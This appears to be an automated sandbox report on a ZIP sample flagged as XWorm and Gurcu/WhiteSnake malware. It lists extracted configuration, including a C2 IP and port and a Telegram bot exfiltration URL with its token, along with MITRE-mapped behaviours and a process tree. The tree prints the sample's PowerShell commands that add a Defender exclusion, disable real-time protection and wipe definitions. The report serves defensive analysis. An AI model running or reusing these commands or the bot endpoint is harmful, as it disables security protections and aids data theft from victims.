gurcu | ace47168d15ff37ea019a11bc0ad4f5353d277a9a9ebee6eeccb3101727cfb73

Resubmissions

28-11-2024 18:39

241128-xa2qvswmbw 10

28-11-2024 18:35

241128-w8brnawlfs 10

Analysis

max time kernel
177s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 18:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

w.zip
Size

7.7MB
MD5

9d50cd54890adf361bf032cc719d72cd
SHA1

7a82332c39a7aede83a9b92c98b4f6ff982b0fff
SHA256

ace47168d15ff37ea019a11bc0ad4f5353d277a9a9ebee6eeccb3101727cfb73
SHA512

19ebe2b83023b1c0b394ffaaffa5812c43c45ba870fe8293c6b393fe33df9abd0606c22b1ae3870431fa899e6e88f5a9969fb79f208c16ded020d5d81ae2fadc
SSDEEP

196608:PhyiwlApBaKR+w7tqsiNtGROHDqJhafp/VSFtMX30I8/rS:yApR+4tHiNtGRaG00FtJm

Score

10^/10

gurcu xworm collection credential_access defense_evasion discovery execution persistence phishing privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

154.216.19.12:7000

Mutex

NuXVPKhDBKHTLExY

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk/sendMessage?chat_id=-4563001294

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023c05-108.dat	family_xworm
behavioral2/memory/4392-109-0x0000000000DD0000-0x0000000000DE0000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3792	powershell.exe
2360	powershell.exe
524	powershell.exe
3940	powershell.exe
6320	powershell.exe
6440	powershell.exe
1508	powershell.exe
2216	powershell.exe
5716	powershell.exe
2560	powershell.exe
3480	powershell.exe

A potential corporate email address has been identified in the URL: FluxJacker@mrfluxdevNewCLientAF96946CAE31DEFA5DF4UserNameAdminOSFullNameMicrosoftWindows10ProUSBFalseCPUIntelCoreProcessorBroadwellGPUMicrosoftBasicDisplayAdapterRAMErrorGroupFJv1snew
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4776	cmd.exe
4280	powershell.exe
4420	cmd.exe
6460	powershell.exe

Executes dropped EXE 9 IoCs

pid	Process
1424	win12.exe
64	win12.exe
4392	bound.exe
3040	rar.exe
760	win12.exe
1040	win12.exe
4948	pjomlu.exe
528	pjomlu.exe
5204	rar.exe

Loads dropped DLL 50 IoCs

pid	Process
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
64	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
1040	win12.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe
528	pjomlu.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
5488	tasklist.exe
4992	tasklist.exe
5736	tasklist.exe
6712	tasklist.exe
4304	tasklist.exe
2144	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0009000000023bc8-41.dat	upx
behavioral2/memory/64-45-0x00007FFA73B50000-0x00007FFA741B3000-memory.dmp	upx
behavioral2/files/0x000e000000023bba-50.dat	upx
behavioral2/memory/64-49-0x00007FFA821D0000-0x00007FFA821F7000-memory.dmp	upx
behavioral2/files/0x000a000000023b9a-48.dat	upx
behavioral2/memory/64-52-0x00007FFA82BA0000-0x00007FFA82BAF000-memory.dmp	upx
behavioral2/files/0x000a000000023b9b-63.dat	upx
behavioral2/files/0x000a000000023ba1-69.dat	upx
behavioral2/files/0x000a000000023ba0-68.dat	upx
behavioral2/files/0x000a000000023b9f-67.dat	upx
behavioral2/files/0x000a000000023b9e-66.dat	upx
behavioral2/files/0x000a000000023b9d-65.dat	upx
behavioral2/files/0x000a000000023b9c-64.dat	upx
behavioral2/files/0x000a000000023b99-62.dat	upx
behavioral2/files/0x0008000000023bd3-61.dat	upx
behavioral2/files/0x0008000000023bd0-60.dat	upx
behavioral2/files/0x000e000000023bce-59.dat	upx
behavioral2/files/0x0008000000023bc3-56.dat	upx
behavioral2/files/0x000a000000023bb3-55.dat	upx
behavioral2/memory/64-75-0x00007FFA7A730000-0x00007FFA7A75B000-memory.dmp	upx
behavioral2/memory/64-77-0x00007FFA7A0A0000-0x00007FFA7A0B9000-memory.dmp	upx
behavioral2/memory/64-79-0x00007FFA7A070000-0x00007FFA7A095000-memory.dmp	upx
behavioral2/memory/64-81-0x00007FFA73850000-0x00007FFA739CF000-memory.dmp	upx
behavioral2/memory/64-85-0x00007FFA821C0000-0x00007FFA821CD000-memory.dmp	upx
behavioral2/memory/64-84-0x00007FFA7A760000-0x00007FFA7A779000-memory.dmp	upx
behavioral2/memory/64-92-0x00007FFA73240000-0x00007FFA73773000-memory.dmp	upx
behavioral2/memory/64-91-0x00007FFA73A50000-0x00007FFA73A84000-memory.dmp	upx
behavioral2/memory/64-94-0x00007FFA73780000-0x00007FFA7384E000-memory.dmp	upx
behavioral2/memory/64-90-0x00007FFA73B50000-0x00007FFA741B3000-memory.dmp	upx
behavioral2/memory/64-99-0x00007FFA7FDE0000-0x00007FFA7FDED000-memory.dmp	upx
behavioral2/memory/64-97-0x00007FFA7A050000-0x00007FFA7A064000-memory.dmp	upx
behavioral2/memory/64-105-0x00007FFA73180000-0x00007FFA73233000-memory.dmp	upx
behavioral2/memory/64-96-0x00007FFA821D0000-0x00007FFA821F7000-memory.dmp	upx
behavioral2/memory/64-246-0x00007FFA7A070000-0x00007FFA7A095000-memory.dmp	upx
behavioral2/memory/64-327-0x00007FFA73850000-0x00007FFA739CF000-memory.dmp	upx
behavioral2/memory/64-352-0x00007FFA73240000-0x00007FFA73773000-memory.dmp	upx
behavioral2/memory/64-351-0x00007FFA73A50000-0x00007FFA73A84000-memory.dmp	upx
behavioral2/memory/64-363-0x00007FFA73780000-0x00007FFA7384E000-memory.dmp	upx
behavioral2/memory/64-374-0x00007FFA73B50000-0x00007FFA741B3000-memory.dmp	upx
behavioral2/memory/64-389-0x00007FFA7FDE0000-0x00007FFA7FDED000-memory.dmp	upx
behavioral2/memory/64-380-0x00007FFA73850000-0x00007FFA739CF000-memory.dmp	upx
behavioral2/memory/64-831-0x00007FFA73B50000-0x00007FFA741B3000-memory.dmp	upx
behavioral2/memory/1040-894-0x00007FFA64E90000-0x00007FFA654F3000-memory.dmp	upx
behavioral2/memory/1040-895-0x00007FFA6DCE0000-0x00007FFA6DD07000-memory.dmp	upx
behavioral2/memory/1040-896-0x00007FFA83290000-0x00007FFA8329F000-memory.dmp	upx
behavioral2/memory/1040-906-0x00007FFA6DCB0000-0x00007FFA6DCDB000-memory.dmp	upx
behavioral2/memory/1040-907-0x00007FFA83070000-0x00007FFA83089000-memory.dmp	upx
behavioral2/memory/1040-908-0x00007FFA6DC50000-0x00007FFA6DC75000-memory.dmp	upx
behavioral2/memory/1040-909-0x00007FFA6BB00000-0x00007FFA6BC7F000-memory.dmp	upx
behavioral2/memory/1040-910-0x00007FFA6DC30000-0x00007FFA6DC49000-memory.dmp	upx
behavioral2/memory/1040-911-0x00007FFA739D0000-0x00007FFA739DD000-memory.dmp	upx
behavioral2/memory/1040-912-0x00007FFA6D7F0000-0x00007FFA6D824000-memory.dmp	upx
behavioral2/memory/1040-914-0x00007FFA6D720000-0x00007FFA6D7EE000-memory.dmp	upx
behavioral2/memory/1040-913-0x00007FFA64E90000-0x00007FFA654F3000-memory.dmp	upx
behavioral2/memory/1040-916-0x00007FFA64950000-0x00007FFA64E83000-memory.dmp	upx
behavioral2/memory/1040-917-0x00007FFA6DCE0000-0x00007FFA6DD07000-memory.dmp	upx
behavioral2/memory/1040-918-0x00007FFA6DC10000-0x00007FFA6DC24000-memory.dmp	upx
behavioral2/memory/1040-920-0x00007FFA6E0A0000-0x00007FFA6E0AD000-memory.dmp	upx
behavioral2/memory/1040-919-0x00007FFA6DCB0000-0x00007FFA6DCDB000-memory.dmp	upx
behavioral2/memory/1040-931-0x00007FFA6D720000-0x00007FFA6D7EE000-memory.dmp	upx
behavioral2/memory/1040-930-0x00007FFA6D7F0000-0x00007FFA6D824000-memory.dmp	upx
behavioral2/memory/1040-929-0x00007FFA739D0000-0x00007FFA739DD000-memory.dmp	upx
behavioral2/memory/1040-935-0x00007FFA64950000-0x00007FFA64E83000-memory.dmp	upx
behavioral2/memory/1040-934-0x00007FFA6E0A0000-0x00007FFA6E0AD000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
996	cmd.exe
5540	netsh.exe
4740	cmd.exe
6592	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5672	WMIC.exe
5572	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5608	systeminfo.exe
6452	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
6736	taskkill.exe
6820	taskkill.exe
6500	taskkill.exe
3988	taskkill.exe
4048	taskkill.exe
2996	taskkill.exe
6976	taskkill.exe
1920	taskkill.exe
6216	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772928304430309"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1508	powershell.exe
1508	powershell.exe
3792	powershell.exe
3792	powershell.exe
3480	powershell.exe
3480	powershell.exe
1508	powershell.exe
2560	powershell.exe
2560	powershell.exe
3480	powershell.exe
3480	powershell.exe
3792	powershell.exe
3792	powershell.exe
4280	powershell.exe
4280	powershell.exe
2560	powershell.exe
2560	powershell.exe
4280	powershell.exe
5660	powershell.exe
5660	powershell.exe
5660	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
4392	bound.exe
4392	bound.exe
5428	powershell.exe
5428	powershell.exe
5428	powershell.exe
524	powershell.exe
524	powershell.exe
524	powershell.exe
5956	powershell.exe
5956	powershell.exe
5956	powershell.exe
2628	chrome.exe
2628	chrome.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe
4392	bound.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
752	7zFM.exe
4392	bound.exe
3820	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe
6764	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	752	7zFM.exe
Token: 35	752	7zFM.exe
Token: SeSecurityPrivilege	752	7zFM.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	4304	tasklist.exe
Token: SeDebugPrivilege	2144	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1540	WMIC.exe
Token: SeSecurityPrivilege	1540	WMIC.exe
Token: SeTakeOwnershipPrivilege	1540	WMIC.exe
Token: SeLoadDriverPrivilege	1540	WMIC.exe
Token: SeSystemProfilePrivilege	1540	WMIC.exe
Token: SeSystemtimePrivilege	1540	WMIC.exe
Token: SeProfSingleProcessPrivilege	1540	WMIC.exe
Token: SeIncBasePriorityPrivilege	1540	WMIC.exe
Token: SeCreatePagefilePrivilege	1540	WMIC.exe
Token: SeBackupPrivilege	1540	WMIC.exe
Token: SeRestorePrivilege	1540	WMIC.exe
Token: SeShutdownPrivilege	1540	WMIC.exe
Token: SeDebugPrivilege	1540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1540	WMIC.exe
Token: SeRemoteShutdownPrivilege	1540	WMIC.exe
Token: SeUndockPrivilege	1540	WMIC.exe
Token: SeManageVolumePrivilege	1540	WMIC.exe
Token: 33	1540	WMIC.exe
Token: 34	1540	WMIC.exe
Token: 35	1540	WMIC.exe
Token: 36	1540	WMIC.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	5488	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1540	WMIC.exe
Token: SeSecurityPrivilege	1540	WMIC.exe
Token: SeTakeOwnershipPrivilege	1540	WMIC.exe
Token: SeLoadDriverPrivilege	1540	WMIC.exe
Token: SeSystemProfilePrivilege	1540	WMIC.exe
Token: SeSystemtimePrivilege	1540	WMIC.exe
Token: SeProfSingleProcessPrivilege	1540	WMIC.exe
Token: SeIncBasePriorityPrivilege	1540	WMIC.exe
Token: SeCreatePagefilePrivilege	1540	WMIC.exe
Token: SeBackupPrivilege	1540	WMIC.exe
Token: SeRestorePrivilege	1540	WMIC.exe
Token: SeShutdownPrivilege	1540	WMIC.exe
Token: SeDebugPrivilege	1540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1540	WMIC.exe
Token: SeRemoteShutdownPrivilege	1540	WMIC.exe
Token: SeUndockPrivilege	1540	WMIC.exe
Token: SeManageVolumePrivilege	1540	WMIC.exe
Token: 33	1540	WMIC.exe
Token: 34	1540	WMIC.exe
Token: 35	1540	WMIC.exe
Token: 36	1540	WMIC.exe
Token: SeDebugPrivilege	5660	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4392	bound.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeIncreaseQuotaPrivilege	4976	WMIC.exe
Token: SeSecurityPrivilege	4976	WMIC.exe
Token: SeTakeOwnershipPrivilege	4976	WMIC.exe
Token: SeLoadDriverPrivilege	4976	WMIC.exe
Token: SeSystemProfilePrivilege	4976	WMIC.exe
Token: SeSystemtimePrivilege	4976	WMIC.exe
Token: SeProfSingleProcessPrivilege	4976	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
752	7zFM.exe
752	7zFM.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
752	7zFM.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
2628	chrome.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
3820	taskmgr.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4392	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 752 wrote to memory of 1424	752	7zFM.exe	88
PID 752 wrote to memory of 1424	752	7zFM.exe	88
PID 1424 wrote to memory of 64	1424	win12.exe	90
PID 1424 wrote to memory of 64	1424	win12.exe	90
PID 64 wrote to memory of 3364	64	win12.exe	93
PID 64 wrote to memory of 3364	64	win12.exe	93
PID 64 wrote to memory of 1620	64	win12.exe	94
PID 64 wrote to memory of 1620	64	win12.exe	94
PID 64 wrote to memory of 1524	64	win12.exe	95
PID 64 wrote to memory of 1524	64	win12.exe	95
PID 64 wrote to memory of 1992	64	win12.exe	97
PID 64 wrote to memory of 1992	64	win12.exe	97
PID 64 wrote to memory of 5016	64	win12.exe	98
PID 64 wrote to memory of 5016	64	win12.exe	98
PID 64 wrote to memory of 1776	64	win12.exe	101
PID 64 wrote to memory of 1776	64	win12.exe	101
PID 1776 wrote to memory of 2560	1776	cmd.exe	105
PID 1776 wrote to memory of 2560	1776	cmd.exe	105
PID 1524 wrote to memory of 3480	1524	cmd.exe	106
PID 1524 wrote to memory of 3480	1524	cmd.exe	106
PID 3364 wrote to memory of 1508	3364	cmd.exe	107
PID 3364 wrote to memory of 1508	3364	cmd.exe	107
PID 1620 wrote to memory of 3792	1620	cmd.exe	108
PID 1620 wrote to memory of 3792	1620	cmd.exe	108
PID 5016 wrote to memory of 1420	5016	cmd.exe	109
PID 5016 wrote to memory of 1420	5016	cmd.exe	109
PID 1992 wrote to memory of 4392	1992	cmd.exe	110
PID 1992 wrote to memory of 4392	1992	cmd.exe	110
PID 64 wrote to memory of 436	64	win12.exe	111
PID 64 wrote to memory of 436	64	win12.exe	111
PID 64 wrote to memory of 4944	64	win12.exe	112
PID 64 wrote to memory of 4944	64	win12.exe	112
PID 4944 wrote to memory of 2144	4944	cmd.exe	115
PID 4944 wrote to memory of 2144	4944	cmd.exe	115
PID 436 wrote to memory of 4304	436	cmd.exe	116
PID 436 wrote to memory of 4304	436	cmd.exe	116
PID 64 wrote to memory of 4476	64	win12.exe	117
PID 64 wrote to memory of 4476	64	win12.exe	117
PID 64 wrote to memory of 4776	64	win12.exe	119
PID 64 wrote to memory of 4776	64	win12.exe	119
PID 64 wrote to memory of 2956	64	win12.exe	121
PID 64 wrote to memory of 2956	64	win12.exe	121
PID 64 wrote to memory of 2360	64	win12.exe	157
PID 64 wrote to memory of 2360	64	win12.exe	157
PID 64 wrote to memory of 996	64	win12.exe	124
PID 64 wrote to memory of 996	64	win12.exe	124
PID 64 wrote to memory of 116	64	win12.exe	126
PID 64 wrote to memory of 116	64	win12.exe	126
PID 4776 wrote to memory of 4280	4776	cmd.exe	127
PID 4776 wrote to memory of 4280	4776	cmd.exe	127
PID 64 wrote to memory of 4072	64	win12.exe	130
PID 64 wrote to memory of 4072	64	win12.exe	130
PID 4476 wrote to memory of 1540	4476	cmd.exe	132
PID 4476 wrote to memory of 1540	4476	cmd.exe	132
PID 2956 wrote to memory of 5488	2956	cmd.exe	133
PID 2956 wrote to memory of 5488	2956	cmd.exe	133
PID 996 wrote to memory of 5540	996	cmd.exe	134
PID 996 wrote to memory of 5540	996	cmd.exe	134
PID 2360 wrote to memory of 5556	2360	cmd.exe	135
PID 2360 wrote to memory of 5556	2360	cmd.exe	135
PID 116 wrote to memory of 5608	116	cmd.exe	136
PID 116 wrote to memory of 5608	116	cmd.exe	136
PID 4072 wrote to memory of 5660	4072	cmd.exe	137
PID 4072 wrote to memory of 5660	4072	cmd.exe	137

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\w.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:752
- C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:64
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO0F28A5B7\win12.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
